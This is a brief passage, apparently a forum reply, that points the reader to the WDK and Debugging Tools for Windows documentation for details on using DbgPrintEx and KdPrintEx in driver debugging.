See the WDK documentation for Reading and Filtering Debugging Messages (follow the path: Driver Development Tools\Tools for Debugging Drivers\Using Debugging Code in a Driver\Debugging Code Overview) for the complete details on the use of DbgPrintEx/KdPrintEx.  Or look at theDebugging Tools For Windows documentation (Appendix A) on DbgPrintEx.